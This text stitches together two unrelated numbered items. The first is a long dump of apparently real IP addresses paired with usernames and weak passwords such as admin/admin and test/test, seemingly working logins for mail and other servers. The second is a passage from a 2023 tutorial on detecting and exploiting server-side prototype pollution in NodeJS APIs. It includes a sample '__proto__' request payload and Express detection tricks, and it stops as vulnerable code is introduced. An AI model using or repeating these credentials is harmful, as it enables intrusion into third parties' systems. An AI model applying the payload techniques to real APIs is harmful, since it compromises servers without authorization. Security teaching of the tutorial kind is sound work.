  7. 188.247.136.61,fax,password 188.247.136.87,admin,admin 188.247.152.9,admin,password 188.247.184.6,sales,password 188.247.136.67,admin,admin123456 188.247.168.16,admin,123456 188.247.136.66,postmaster,123456 188.247.136.63,admin,admin123456 188.247.192.1,postmaster,123456 188.247.200.98,fax,fax 188.247.152.5,admin,admin 188.247.192.10,administrator,password 188.247.184.0,admin,admin123 188.247.136.65,admin,admin123 188.247.144.0,fax,fax 188.247.136.88,webmaster,password 188.247.136.57,fax,123456 188.247.168.13,fax,fax 188.247.136.50,admin,123456 188.247.136.58,admin,123456 188.247.136.74,admin,admin123 188.247.136.70,admin,password 188.247.168.14,administrator,123456 188.247.136.71,admin,password 188.247.136.55,webmaster,password 188.247.200.7,administrator,password 188.247.192.8,admin,admin123456 188.247.136.91,webmaster,webmaster 188.39.20.83,besadmin,besadmin 188.39.8.50,test,test 188.36.180.216,admin,admin 188.40.123.251,postmaster,postmaster 188.40.128.87,test,test 188.40.137.19,test,test 188.40.137.145,spam,123456 12.129.15.118,test,test 12.70.90.18,test,test 12.130.93.253,test,test 12.130.93.254,test,test 12.130.93.254,test,test 12.139.6.236,test,test 12.153.127.37,test,test 12.139.242.103,test,test 12.175.26.55,test,test 12.175.26.55,test,test 23.19.0.20,test,test 23.19.0.217,test,test 23.19.0.26,test,test 23.19.0.27,test,test 23.19.0.231,test,test 23.19.0.188,test,test 23.19.0.155,test,test 23.19.0.223,test,test 23.19.0.44,test,test 23.19.0.238,test,test 23.19.0.175,test,test 23.19.0.100,test,test 23.19.0.61,test,test 23.19.0.124,test,test 23.19.0.33,test,test 23.19.0.168,test,test 12.200.27.36,test,test123 23.19.0.114,test,test 23.19.124.115,test,test 23.19.0.197,test,test 23.19.124.154,test,test 23.19.124.179,test,test 23.19.124.197,test,test 23.19.117.52,test,test 23.19.124.174,test,test 23.19.0.14,test,test 23.19.0.199,test,test 23.19.0.170,test,test 23.19.0.176,test,test 23.19.0.87,test,test 23.19.0.248,test,test 23.19.0.38,test,test 23.19.0.47,test,test 23.19.0.36,test,test 23.19.0.235,test,test 23.19.0.132,test,test 23.19.0.153,test,test 23.19.0.144,test,test 23.19.0.34,test,test 23.19.0.119,test,test 23.19.0.147,test,test 23.19.0.213,test,test 23.19.0.82,test,test 23.19.0.49,test,test 23.19.0.230,test,test 23.19.0.18,test,test 23.19.0.39,test,test 23.19.117.90,test,test 23.19.0.150,test,test 23.19.0.15,test,test 23.19.0.7,test,test 23.19.0.225,test,test 23.19.0.202,test,test 23.19.0.92,test,test 23.19.0.250,test,test 23.19.0.194,test,test 23.19.0.78,test,test 23.19.0.74,test,test 23.19.124.34,test,test 23.19.0.69,test,test 23.19.0.113,test,test 23.19.0.90,test,test 23.19.124.88,test,test 23.19.0.64,test,test 23.19.124.166,test,test 23.19.203.251,test,test 23.19.191.44,test,test 23.19.117.97,test,test 23.19.203.55,test,test 23.19.203.176,test,test 23.19.0.106,test,test 23.19.191.19,test,test 23.19.206.22,test,test 23.19.191.193,test,test 23.19.191.217,test,test 23.19.0.52,test,test 23.19.0.23,test,test 23.19.0.167,test,test 23.19.0.40,test,test 23.19.191.222,test,test 23.19.247.241,test,test 23.19.189.155,test,test 23.19.203.183,test,test 23.19.247.56,test,test 23.19.206.45,test,test 23.19.124.57,test,test 23.19.0.159,test,test 23.19.0.76,test,test 23.19.203.29,test,test 23.19.0.247,test,test 23.19.203.164,test,test 23.19.117.233,test,test 23.19.124.138,test,test 23.19.189.50,test,test 23.19.117.13,test,test 23.19.0.201,test,test 23.19.117.98,test,test 23.19.0.205,test,test 23.19.0.173,test,test 23.19.191.218,test,test 23.19.117.186,test,test 23.19.0.51,test,test 23.19.0.10,test,test 12.233.19.135,test,test 23.19.0.138,test,test 23.19.247.33,test,test 23.19.0.228,test,test 23.19.117.76,test,test 23.19.191.176,test,test 23.19.124.138,test,test 23.19.117.61,test,test 23.19.117.245,test,test 23.19.117.38,test,test 23.19.117.69,test,test 23.19.124.149,test,test 23.19.117.237,test,test 23.19.255.9,test,test 23.19.191.154,test,test 23.19.253.107,test,test 23.19.0.206,test,test 23.19.124.172,test,test 23.19.124.24,test,test 23.19.124.80,test,test 23.19.117.232,test,test 23.19.124.111,test,test 23.19.124.38,test,test 23.19.124.44,test,test 23.19.117.250,test,test 23.19.117.241,test,test 23.19.124.136,test,test 23.19.189.88,test,test 23.19.203.51,test,test 23.19.189.134,test,test 23.19.124.103,test,test 23.19.117.103,test,test 23.19.124.188,test,test 23.19.0.8,test,test123 23.19.0.243,test,test123 23.19.0.192,test,test 23.19.0.220,test,test123 23.19.0.79,test,test123 23.19.124.200,test,test 23.19.191.118,test,test 23.19.255.146,test,test 23.19.0.131,test,test 23.19.0.17,test,test123 23.19.0.164,test,test123 23.19.0.186,test,test123 23.19.0.181,test,test123 23.19.0.207,test,test123 23.19.0.116,test,test 23.19.117.61,test,test 23.19.0.233,test,test123 23.19.117.50,test,test 23.19.0.93,test,test 23.19.0.41,test,test 23.19.191.45,test,test 23.19.189.125,test,test 23.19.203.236,test,test 23.19.189.53,test,test 23.19.191.99,test,test 23.19.189.83,test,test 23.19.0.37,test,test 23.19.255.253,test,test 23.19.0.211,test,test 23.19.189.45,test,test 23.19.0.129,test,test 23.19.189.228,test,test 23.19.255.187,test,test 23.19.243.62,test,test 23.19.0.198,test,test 23.19.253.63,test,test 23.19.237.22,test,test 23.19.117.238,test,test 23.19.203.126,test,test 23.19.229.97,test,test 23.19.247.26,test,test 23.19.247.155,test,test 23.19.0.57,test,test123 23.19.0.169,test,test 23.19.189.48,test,test 23.19.0.134,test,test 23.19.0.63,test,test 23.19.0.148,test,test 23.19.203.98,test,test 23.19.247.200,test,test 23.19.203.227,test,test 23.19.117.25,test,test 23.19.117.240,test,test 23.19.0.99,test,test 23.19.203.206,test,test 23.19.189.15,test,test 23.19.191.101,test,test 23.19.203.10,test,test 23.19.0.121,test,test 23.19.229.123,test,test 23.19.117.188,test,test 23.19.203.107,test,test 23.19.203.250,test,test 23.19.0.195,test,test 23.19.253.64,test,test 23.19.117.29,test,test 23.19.191.122,test,test 23.19.0.11,test,test 23.19.124.149,test,test 23.19.189.61,test,test 23.19.0.103,test,test 23.19.0.13,test,test 23.19.191.184,test,test 23.19.189.188,test,test 23.19.203.106,test,test 23.19.0.224,test,test 23.19.0.81,test,test 23.19.0.53,test,test 23.19.203.76,test,test 23.19.117.71,test,test 23.19.189.67,test,test 23.19.203.26,test,test 23.19.253.52,test,test 23.19.243.54,test,test 23.19.189.135,test,test 23.19.117.63,test,test 23.19.0.140,test,test 23.19.0.252,test,test 23.19.255.43,test,test 23.19.253.61,test,test 23.19.253.86,test,test 23.19.117.27,test,test 23.19.206.21,test,test 23.19.255.55,test,test 23.19.253.242,test,test 23.19.247.41,test,test 23.19.253.90,test,test 23.19.0.109,test,test 23.19.0.189,test,test123 23.19.0.135,test,test123 23.19.0.219,test,test123 23.19.189.189,test,test 23.19.117.81,test,test 23.19.117.147,test,test 23.19.117.117,test,test 23.19.243.103,test,test 23.19.203.12,test,test 23.19.203.71,test,test 23.19.0.50,test,test 23.19.0.24,test,test 23.19.0.187,test,test 23.19.0.226,test,test 23.19.124.129,test,test 23.19.255.5,test,test 23.19.0.91,test,test 23.19.0.43,test,test 23.19.0.6,test,test 23.19.255.225,test,test 23.19.117.249,test,test 23.19.124.167,test,test 23.19.124.65,test,test 23.19.117.143,test,test 23.19.0.143,test,test 23.19.191.65,test,test 23.19.117.214,test,test 23.19.117.133,test,test 23.19.0.65,test,test 23.19.0.157,test,test 23.19.124.92,test,test 23.19.255.166,test,test 23.19.117.167,test,test 23.19.124.238,test,test 23.19.203.100,test,test 23.19.124.212,test,test 23.19.247.148,test,test 23.19.191.114,test,test 23.19.247.68,test,test 23.19.243.234,test,test 23.19.203.196,test,test 23.19.117.18,test,test 23.19.124.33,test,test 23.19.206.156,test,test 23.19.117.246,test,test 23.19.117.51,test,test 23.19.253.211,test,test 23.19.191.180,test,test 23.19.243.106,test,test 23.19.191.137,test,test 23.19.206.122,test,test 23.19.203.210,test,test 23.19.191.145,test,test 23.19.255.19,test,test 23.19.124.23,test,test 23.19.253.13,test,test 23.19.255.144,test,test 23.19.206.105,test,test 23.19.247.171,test,test 23.19.189.104,test,test 23.19.191.50,test,test 23.19.253.219,test,test 23.19.191.169,test,test 23.19.117.37,test,test 23.19.189.230,test,test 23.19.206.215,test,test 23.19.189.86,test,test 23.19.191.174,test,test 23.19.229.74,test,test 23.19.124.237,test,test 23.19.253.246,test,test 23.19.0.19,test,test 23.19.189.154,test,test 23.19.117.44,test,test 23.19.229.87,test,test 23.19.0.94,test,test 23.19.0.222,test,test 23.19.191.224,test,test 23.19.191.197,test,test 23.19.191.167,test,test 23.19.189.108,test,test 23.19.191.43,test,test 23.19.0.191,test,test 23.19.255.145,test,test 23.19.117.42,test,test 23.19.206.41,test,test 23.19.117.24,test,test 23.19.124.83,test,test 23.19.237.45,test,test 23.19.229.9,test,test 23.19.0.229,test,test 23.19.0.60,test,test 23.19.0.163,test,test 23.19.0.29,test,test 23.19.117.131,test,test 23.19.0.73,test,test 23.19.247.185,test,test 23.19.124.8,test,test 23.19.0.56,test,test 23.19.203.243,test,test 23.19.0.16,test,test 23.19.124.86,test,test 23.19.117.166,test,test 23.19.0.236,test,test 23.19.229.22,test,test 23.19.191.160,test,test 23.19.0.178,test,test 23.19.0.120,test,test 23.19.0.160,test,test 23.19.0.122,test,test 23.19.0.177,test,test 23.19.117.39,test,test 23.19.0.83,test,test 23.19.117.226,test,test 23.19.0.25,test,test 23.19.117.7,test,test 23.19.223.65,test,test 23.19.206.125,test,test 23.19.117.10,test,test 23.19.124.5,test,test 23.19.117.221,test,test 23.19.117.180,test,test 23.19.0.112,test,test 23.19.0.242,test,test 23.19.0.45,test,test 23.19.124.22,test,test 23.19.191.251,test,test 23.19.124.82,test,test 23.19.117.95,test,test 23.19.0.214,test,test 23.19.189.112,test,test 23.19.0.156,test,test 23.19.203.105,test,test 23.19.229.81,test,test 23.19.247.173,test,test 23.19.229.85,test,test 23.19.124.167,test,test 23.19.124.202,test,test 23.19.203.204,test,test 23.19.117.211,test,test 23.19.0.182,test,test 23.19.0.208,test,test 23.19.117.227,test,test 23.19.117.137,test,test 23.19.247.119,test,test 23.19.0.215,test,test 23.19.247.58,test,test 23.19.117.173,test,test 23.19.0.125,test,test 23.19.124.106,test,test 23.19.189.226,test,test 23.19.255.33,test,test 23.19.247.226,test,test 23.19.247.29,test,test 23.19.0.102,test,test123 23.19.0.137,test,test 23.19.247.71,test,test 23.19.124.176,test,test 23.19.0.162,test,test 23.19.124.120,test,test 23.19.117.136,test,test 23.19.117.184,test,test 23.19.255.136,test,test 23.19.247.45,test,test 23.19.117.92,test,test 23.19.117.239,test,test 23.19.117.33,test,test 23.19.0.84,test,test 23.19.124.123,test,test 23.19.0.107,test,test123 23.19.0.190,test,test123 23.19.0.54,test,test123 23.19.117.79,test,test 23.19.0.68,test,test123 23.19.117.159,test,test 23.19.124.157,test,test 23.19.0.216,test,test123 23.19.0.95,test,test 23.19.124.105,test,test 23.19.223.99,test,test 23.19.191.225,test,test 23.19.203.144,test,test 23.19.0.180,test,test 23.19.229.246,test,test 23.19.191.153,test,test 23.19.247.35,test,test 23.19.237.213,test,test 23.19.0.184,test,test 23.19.247.242,test,test 23.19.206.214,test,test 23.19.247.76,test,test 23.19.237.246,test,test 23.19.189.80,test,test 23.19.191.241,test,test 23.19.191.215,test,test 23.19.124.10,test,test 23.19.255.41,test,test 23.19.255.216,test,test 23.19.237.82,test,test 23.19.0.185,test,test 23.19.255.20,test,test 50.115.7.162,test,test 50.115.7.172,test,test 50.115.7.150,test,test 50.115.7.103,test,test 50.115.12.50,test,test 50.115.7.86,test,123456 50.115.4.84,test,test123 50.115.7.155,test,test123 50.115.4.213,test,test123 50.115.7.37,test,test123 50.115.4.101,test,test123 50.115.7.36,test,test 50.115.4.231,test,test123 50.115.7.149,test,test 50.115.7.96,test,test123 50.115.12.85,test,test123 50.115.14.218,spam,spam 50.115.12.185,test,test123 50.115.14.28,test,123456 50.115.4.119,test,test123 50.115.4.223,test,test123 50.115.7.142,test,test 50.115.7.153,test,test123 50.115.7.235,test,password 50.115.4.88,test,test123 50.115.12.105,test,test 50.115.7.228,test,test 50.115.4.4,spam,spam 50.115.12.48,test,test 50.115.12.189,test,test 50.115.4.168,test,test 50.115.7.106,test,test 50.115.7.143,test,test 50.115.7.169,test,test 50.115.12.157,test,test 50.115.4.142,test,test 50.115.7.58,spam,spam 50.115.7.238,test,test 50.115.4.212,test,test123 50.115.14.129,test,123456 50.115.4.130,test,test123 50.115.7.182,test,test123 50.115.4.177,test,password 50.115.14.27,test,test123 50.115.4.19,test,test123 50.115.4.179,info,info123 50.115.4.53,test,test123 50.115.7.89,test,test 50.115.14.169,test,test 50.115.7.99,test,123456 50.115.7.64,test,test 50.115.7.122,test,123456 50.115.7.249,spam,spam 50.115.14.210,spam,123456 50.115.14.65,test,123456 50.115.7.131,test,password 50.115.12.92,test,test123 50.115.12.6,test,test123 50.115.14.87,test,test 50.115.14.132,test,test 50.115.14.92,test,test 50.115.12.64,test,test 50.115.14.71,test,test 50.115.12.218,test,test 50.115.4.187,test,test 50.115.14.204,test,test 50.115.14.199,test,password 50.115.14.214,test,test 50.115.4.41,test,test 50.115.7.201,test,test 50.115.7.85,test,test123 50.115.4.152,test,password 50.115.12.27,test,test123 50.115.12.159,test,test123 50.115.14.164,info,info 50.115.7.126,test,test123 50.115.7.189,test,test123 50.115.12.203,test,password 50.115.12.211,test,password 50.115.7.165,test,test123 50.115.12.54,test,test 50.115.14.171,test,test 50.115.12.103,test,test 50.115.14.159,test,test 50.115.12.148,spam,spam123 50.115.12.65,test,test 50.115.12.26,test,test123 50.115.7.202,test,test 50.115.12.107,test,test 50.115.7.35,test,test 50.115.7.223,test,test 50.115.7.180,test,test 50.115.7.73,test,test123 50.115.12.188,spam,spam 50.115.4.183,test,password 50.115.7.152,test,123456 50.115.4.131,test,test 50.115.4.92,test,test 50.115.4.49,test,password 50.115.4.77,test,test 50.115.12.53,test,test 50.115.7.151,test,123456 50.115.12.70,test,test 50.115.14.168,test,test 50.115.7.209,test,test 50.115.4.6,test,test 50.115.7.119,test,test 50.115.14.153,test,password 50.115.14.68,spam,spam123 50.115.14.205,spam,spam 50.115.7.181,test,test 50.115.14.89,test,test123 50.115.4.202,test,test 50.115.4.178,test,test 50.115.12.162,spam,123456 50.115.4.44,test,password 50.115.12.142,spam,123456 50.115.4.36,test,password 50.115.12.118,test,test 50.115.7.50,test,password 50.115.14.96,test,test 50.115.12.38,test,test 50.115.12.192,test,test 50.115.7.210,test,test 50.115.7.216,test,test 50.115.14.50,test,test 50.115.14.126,test,test 50.115.14.111,test,test 50.115.14.191,test,123456 50.115.14.128,test,test 50.115.14.103,test,test 50.115.7.91,test,test 50.115.4.89,test,password 50.115.7.214,test,test123 50.115.12.101,test,test 50.115.4.173,test,test 50.115.14.51,test,test 50.115.14.160,test,test 50.115.7.226,test,test 50.115.7.17,test,test 50.115.12.232,test,test 50.115.12.66,test,test 50.115.7.87,test,test 50.115.14.173,test,test 50.115.14.157,test,password 50.115.12.87,test,test 50.115.14.42,test,test 50.115.14.146,test,test 50.115.12.122,test,test 50.115.12.89,test,test 50.115.12.156,test,test 50.115.14.246,test,test 50.115.12.168,test,test123 50.115.14.226,test,test 50.115.7.161,test,test123 50.115.14.196,test,test 50.115.14.100,test,test 50.115.12.24,test,test 50.115.12.230,test,test 50.115.7.232,test,test 50.115.14.253,test,test 50.115.12.79,test,test123 50.115.7.252,test,test 50.115.14.220,test,test 50.115.14.152,test,test 50.115.14.102,test,test 50.115.7.166,test,test 50.115.12.32,test,test 50.115.12.221,test,test 50.115.12.146,test,test 50.115.7.193,test,test 50.115.14.200,test,test 50.115.12.207,test,test 50.115.12.163,test,test123 50.115.4.71,test,test123 50.115.7.148,test,password 50.115.7.127,test,test123 50.115.12.75,test,test123 50.115.14.119,test,test123 50.115.14.134,test,test 50.115.12.63,test,test 50.115.12.249,test,test123 50.115.12.158,test,test 50.115.14.183,test,test 50.115.14.190,test,test 50.115.12.127,test,test 50.115.7.219,test,123456 50.115.12.150,test,password 50.115.14.104,test,test123 50.115.12.52,test,test123 50.115.7.206,test,test123 50.115.12.191,test,test123 50.115.12.106,test,test123 50.115.14.165,test,test 50.115.14.70,test,password 50.115.4.143,test,test123 50.115.14.202,test,test123 50.115.12.204,test,test123 50.115.14.208,test,test123 50.115.12.251,test,test 50.115.14.107,test,test123 50.115.4.205,test,password 50.115.14.182,test,test 50.115.14.101,test,test123 50.115.14.18,test,test 50.115.14.16,test,test 50.115.14.161,test,test123 50.115.14.167,test,test123 50.115.14.213,test,test 50.115.14.118,test,test123 50.115.12.25,test,test123 50.115.12.133,test,test123 50.115.7.7,test,test123 50.115.12.59,test,test 50.115.12.29,test,test 50.115.14.140,test,test 50.115.4.160,test,password 50.115.12.76,test,test 50.115.14.81,test,test 50.115.12.141,test,test123 50.115.12.172,test,test 50.115.14.252,test,test123 50.115.14.244,test,test123 50.115.7.19,test,test123 50.115.12.112,test,test123 50.115.12.170,test,test 50.115.12.149,test,test 50.115.7.247,test,test 50.115.14.131,test,test 50.115.12.111,test,test 50.115.14.185,test,test 50.115.14.95,test,test123 50.115.4.184,spam,spam123 50.115.14.62,test,test123 50.115.14.124,test,password 50.115.7.95,spam,spam123 50.115.14.212,test,test 50.115.7.234,test,test 50.115.14.66,test,test 50.115.12.184,test,password 50.115.14.93,test,test 50.115.12.110,test,test 50.115.12.145,test,test 50.115.4.145,spam,spam 50.115.14.30,test,test 50.115.12.47,test,test123 50.115.14.186,test,test 50.115.12.134,test,test 50.115.12.153,test,test123 50.115.14.148,test,password 50.115.7.168,test,test123 50.115.12.161,test,password 50.115.14.135,test,test 50.115.7.84,spam,password 50.115.12.113,test,test 50.115.7.21,test,123456 50.115.14.37,test,password 50.115.12.220,spam,spam 50.115.7.183,test,123456 50.115.4.230,spam,spam 50.115.12.117,test,test123 50.115.14.35,test,password 50.115.4.118,test,test 50.115.14.115,test,123456 50.115.12.12,test,password 50.115.12.229,test,123456 50.115.14.194,test,password 50.115.12.216,test,test123 50.115.14.232,test,123456 50.115.12.98,test,123456 50.115.12.86,test,123456 50.115.7.157,spam,spam 50.115.14.219,test,test123 50.115.12.71,test,test123 50.115.7.3,spam,spam 50.115.12.173,test,test 50.115.12.186,test,password 50.115.14.109,test,test123 50.115.12.183,test,123456 50.115.12.116,test,123456 50.115.14.184,spam,spam 50.115.12.238,test,password 50.115.7.215,spam,spam123 50.115.14.49,test,123456 50.115.7.218,test,password 50.115.14.20,spam,spam123 50.115.4.97,spam,spam 50.115.4.144,test,test 50.115.12.137,test,test 50.115.12.37,test,test 50.115.12.131,test,test 50.115.4.90,test,test 50.115.12.124,test,test123 50.115.4.176,test,test123 50.115.4.8,test,test 50.115.12.129,test,test 50.117.87.48,test,test 50.117.87.124,test,test 50.117.87.38,test,test 50.117.87.125,test,test 50.117.87.186,test,test 50.117.87.146,test,test 50.117.87.119,test,test 50.117.87.76,test,test 50.117.89.7,test,test 50.117.87.162,test,test 50.117.89.21,test,test 50.117.87.78,test,test 50.117.87.103,test,test 50.117.89.126,test,test 50.117.87.128,test,test 50.117.87.32,test,test 50.117.87.192,test,test 50.117.87.30,test,test 50.117.87.88,test,test 50.117.87.180,test,test 50.117.87.49,test,test 50.117.89.12,test,test 50.117.87.87,test,test 50.117.89.42,test,test 50.117.87.7,test,test 50.117.87.125,test,test 50.117.89.108,test,test 50.115.4.184,spam,spam 50.117.87.6,test,test 50.117.87.216,test,test 50.117.87.188,test,test 50.117.87.162,test,test 50.117.89.108,test,test123 50.117.87.135,test,test 50.117.87.151,test,test 50.117.87.200,test,test 63.70.91.23,test,test 63.87.1.211,test,test 63.96.29.143,info,password 63.112.12.118,test,test 63.131.43.175,test,test 63.135.83.15,test,test 63.65.14.197,service,service 63.131.106.2,spam,spam 63.96.29.45,sale,password123 63.131.93.42,administrator,password 60.254.116.77,fax,fax 63.131.99.166,admin,admin 63.131.91.77,info,123456 63.150.81.18,test,test 63.131.8.117,webmaster,password 63.164.94.133,test,test 63.210.45.160,test,test 63.150.4.235,info,info123 63.96.29.45,admin,password 63.229.10.221,test,test 63.240.86.212,test,test 63.240.86.215,test,test 63.240.86.218,test,test 63.240.86.221,test,test 63.245.15.12,test,test 63.246.6.73,test,test 63.246.6.128,test,test 63.246.6.77,test,test 63.246.6.90,test,test 63.246.6.144,test,test 63.246.6.148,test,test 63.246.6.58,test,test 63.246.6.78,test,test 63.246.6.31,test,test 63.246.6.127,test,test 63.246.6.56,test,test 63.246.6.85,test,test 63.246.6.97,test,test 63.246.6.125,test,test 63.246.6.81,test,test 63.246.6.146,test,test 63.246.6.59,test,test 63.246.6.47,test,test 63.246.6.60,test,test 63.246.6.67,test,test 63.246.6.84,test,test 63.246.6.37,test,test 63.246.6.51,test,test 63.246.6.75,test,test 63.246.6.88,test,test 63.246.6.39,test,test 63.246.6.63,test,test 63.246.6.156,test,test 63.246.6.87,test,test 63.246.6.83,test,test 63.246.6.154,test,test 63.246.6.138,test,test 63.246.6.80,test,test 63.246.6.159,test,test 63.246.6.82,test,test 63.246.6.140,test,test 63.246.6.169,test,test 63.246.6.158,test,test 63.246.6.52,test,test 63.246.6.41,test,test 63.246.6.150,test,test 63.246.6.70,test,test 63.246.6.76,test,test 63.229.61.134,test,password 63.251.53.146,test,test 63.251.6.114,test,test 63.241.3.169,test,password 63.241.4.81,test,password 63.241.4.86,test,password 63.223.69.39,info,password 64.5.53.182,test,password 64.4.84.35,test,123456 64.6.7.124,test,test 63.241.4.88,info,password 63.223.66.165,sales,password 63.240.83.126,spam,123456 63.237.93.245,newsletter,password 63.240.80.47,contact,password 64.14.91.142,test,test 64.14.91.141,test,test 64.17.36.28,test,test 64.17.36.72,test,test 64.17.36.121,test,test 64.17.36.118,test,test 64.17.36.193,test,test 64.17.37.122,test,test 64.17.37.252,test,test 64.17.37.209,test,test 64.17.37.219,test,test 64.17.39.35,test,test 64.17.36.87,test,test 64.17.36.207,test,test 64.17.37.188,test,test 64.17.36.146,test,test 64.17.36.175,test,test 64.17.36.149,test,test 64.17.37.246,test,test 64.17.36.60,test,test 64.17.36.214,test,test 64.17.37.86,test,test 64.17.36.164,test,test 64.17.39.37,test,test 64.17.36.239,test,test 64.17.37.80,test,test 64.17.37.30,test,test 64.17.37.11,test,test 64.17.36.86,test,test 64.17.37.208,test,test 64.17.36.74,test,test 64.17.37.57,test,test 64.17.39.26,test,test 64.17.36.240,test,test 64.17.41.19,test,test 64.17.37.15,test,test 64.17.36.10,test,test 64.17.37.233,test,test 64.17.36.7,test,test 64.17.39.8,test,test 64.17.39.111,test,test 64.17.36.126,test,test 64.17.36.127,test,test 64.17.36.215,test,test 64.17.37.228,test,test 64.17.39.107,test,test 64.17.37.144,test,test 64.17.36.219,test,test 64.17.36.98,test,test 64.17.36.106,test,test 64.17.36.145,test,test 64.17.37.245,test,test 64.17.36.95,test,test 64.17.36.71,test,test 64.17.39.195,test,test 64.17.36.88,test,test 64.17.36.252,test,test 64.17.39.180,test,test 64.17.37.54,test,test 64.17.36.5,test,test 64.17.41.20,test,test 64.17.36.250,test,test 64.17.41.183,test,test 64.17.37.125,test,test 64.17.39.42,test,test 64.17.37.84,test,test 64.17.36.64,test,test 64.17.36.107,test,test 64.17.36.73,test,test 64.17.39.34,test,test 64.17.36.198,test,test 64.17.36.114,test,test 64.17.37.45,test,test 64.17.39.216,test,test 64.17.37.202,test,test 64.17.36.185,test,test 64.17.37.104,test,test 64.17.36.184,test,test 64.17.37.95,test,test 64.17.36.128,test,test 64.17.37.156,test,test 64.17.39.59,test,test 64.17.36.230,test,test 64.17.37.21,test,test 64.17.36.51,test,test 64.17.39.244,test,test 64.17.37.59,test,test 64.17.39.44,test,test 64.17.36.14,test,test 64.17.37.181,test,test 64.17.36.194,test,test 64.17.36.21,test,test 64.17.41.87,test,test 64.17.39.45,test,test 64.17.43.30,test,test 64.17.37.178,test,test 64.17.37.172,test,test 64.17.43.21,test,test 64.17.39.196,test,test 64.17.36.138,test,test 64.17.37.34,test,test 64.17.39.127,test,test 64.17.37.161,test,test 64.17.39.237,test,test 64.17.36.205,test,test 64.17.37.91,test,test 64.17.37.38,test,test 64.17.39.40,test,test 64.17.37.81,test,test 64.17.37.222,test,test 64.17.36.52,test,test 64.17.36.204,test,test 64.17.37.124,test,test 64.17.37.121,test,test 64.17.36.55,test,test 64.17.39.137,test,test 64.17.36.244,test,test 64.17.41.242,test,test 64.17.41.80,test,test 64.17.37.227,test,test 64.17.39.75,test,test 64.17.37.119,test,test 64.17.37.190,test,test 64.17.36.56,test,test 64.17.41.231,test,test 64.17.37.67,test,test 64.17.36.31,test,test 64.17.36.161,test,test123 64.17.37.213,test,test 64.17.36.242,test,test 64.17.37.113,test,test 64.17.36.224,test,test 64.17.41.65,test,test 64.17.36.8,test,test 64.17.36.90,test,test 64.17.36.183,test,test
  8. July 4, 2023 API Hacking Techniques How to exploit an API using prototype pollution Introduction I read somewhere that NodeJS has now been downloaded over 1.5 BILLION times. It’s one of the most popular runtimes startups use to build their web apps and APIs. And big businesses use it too. Everyone from LinkedIn and NetFlix to NASA, Uber, and GoDaddy uses it to drive their software. So what? Why is this important? As a cross-platform JavaScript runtime environment that may be driving the APIs you are testing, understanding how to exploit it is essential. We’ve seen plenty of examples of exploiting JavaScript on the client side, but can this be done on the server side that NodeJS delivers? It ends up you can. It’s called server-side prototype pollution (SSPP). And prototype pollution can be a huge vulnerability you need to know how to detect and exploit. So let’s dive in and discuss what prototype pollution is, why it matters, and how you can weaponize it to exploit an API. What is prototype pollution? Prototype pollution is a type of attack vector in which an attacker can inject data into an object prototype. This attack occurs when the user input isn’t sanitized or filtered properly before being parsed by JavaScript. When this happens, malicious data is added to the global scope, which can be executable code that will run immediately and access privileged information. This type of attack is known as “polluting” the prototype chain, which can lead to a whole host of problems, including remote code execution (RCE). To get a more in-depth understanding, you can check out this article on MDN. Let’s look at an example of how this works. Consider this code: obj[a][b] = c; If an attacker can control a and c, then he can set the value of a to __proto__, and the property b will be defined for all existing objects of the application with the value of c. Can you think of some ways you can abuse this? I bet you can. Detecting Server Side Prototype Pollution So before I show you how to detect SSPP, I need to warn you about something. When testing client-side prototype pollution, you can easily reverse all your changes and return to a clean environment by simply refreshing the target web page. That’s more challenging when testing prototype pollution on the server side. Once you pollute a prototype on the server, this change will persist for the entire lifetime of the Node process, and you don’t have any way of resetting it. This means it can impact production workloads and can negatively impact the API you are testing. So please be aware and be careful. I will show you both some destructive and non-destructive ways to detect SSPP. Use good judgment when applying these techniques to a target. Test for polluted property reflection Look for API endpoints that reflect an object that is created or updated. You can usually find this where objects are created in a POST operation or are updated in a PUT operation. Consider this example: POST /api/user HTTP/1.1 Host: vuln-api.com ... { "user":"bob", "firstName":"Bob", "lastName":"Smith", "__proto__":{ "foo":"bar" } } If the target is vulnerable to SSPP, then you may see a new property called foo with the value of bar reflected in the response: HTTP/1.1 200 OK ... { "username":"bob", "firstName":"Bob", "lastName":"Smith", "foo":"bar" } If this works, it’s time to start looking for places in the API where this can be abused. Suppose you can start adding properties to objects through SSPP. In that case, you can significantly change the business logic code flow and behavior, leading to privileges escalation or remote code execution. Test for poisoned server configuration changes While polluting properties and looking for them in a reflected response works, it is a rather destructive methodology to active objects. And the reality is APIs don’t always reflect objects that are created or updated. This means we don’t always get to SEE that the objects have been modified in this way. There are other ways to cause prototype pollution that we can more easily monitor and detect. One such approach is to try to poison properties that match configuration options for the server and see if it alters its behavior. If it does, it strongly indicates that you’ve found a server-side prototype pollution vulnerability you can exploit. There are several techniques you can use for this. Gareth Heyes has published some excellent research on this already. We will look at a few methods that pollute how cache controls work in Express and how to override the spaces in JSON output. Testing for Cache-Control So if you read Gareth’s research, you will know that the Express developers were onto his shenanigans and started hardening their code to prevent prototype pollution abuse for crucial server configurations. But they haven’t gotten them all (yet). One of the best ways to see if you have found an entry point to poison configuration is to see if you can abuse the cache control in Express. Here is how it works. When you send a request with the “If-None-Match” header, you should expect to receive a 304 (not modified) response. However, if you found SSPP, you can attempt to pollute the Object prototype on the server by adding cache-control=”no-cache”. If it works, when you send the original request that returned a 304, you SHOULD now get a 200 back with that data and a corresponding ETag, demonstrating its vulnerable. Just remember you are affecting the caching for the entire API. If you are doing this on a production server, ensure you have approval and are in constant contact with the Ops group to schedule the testing and notify them when to revert the caching state by restarting the processes. Testing for JSON spaces override So Express offers a lot of configurable options in its server framework. One example of this is the fact you can configure how many spaces a JSON object will use to indent any data in the response. You can test this by attempting to pollute the Object prototype by adding “json spaces” and setting it to a larger number than average, like 10 or 15. If you are testing this with Burp Suite, remember to look at the Raw tab, as the Pretty tab will strip out the extra spaces as it tries to give you easy-to-read JSON output. This methodology has recently been fixed in Express 4.17.4. But for all those older Express instances out there, you can still abuse this. If you want to practice this, PortSwigger has a wicked lab for detecting server-side prototype pollution you can mess with. You can test other ways to detect SSP, like through status codes and character set output. Lots to be learned if you check out the SSPP tutorial on Web Security Academy. A simple vulnerable API in NodeJS example So I wanted to give you something to play with to see all this in action. I encourage you to jump into PortSwigger’s Web Security Academy project. But they don’t let you see the code causing these vulnerabilities. So I’ve written a purposely vulnerable API in NodeJS to walk you through this. I hinted at this when showcasing the prototype pollution for cache control earlier in this article. But I will walk you through an example and demonstrate how you can control code flow in a vulnerable API that ultimately lets you execute a dangerous sink, giving you remote code execution on the API server. DO NOT RUN THIS ON A MACHINE CONNECTED TO THE INTERNET. YOU’VE BEEN WARNED. The vulnerable API code OK, so here is the raw code for our vulnerable API: A 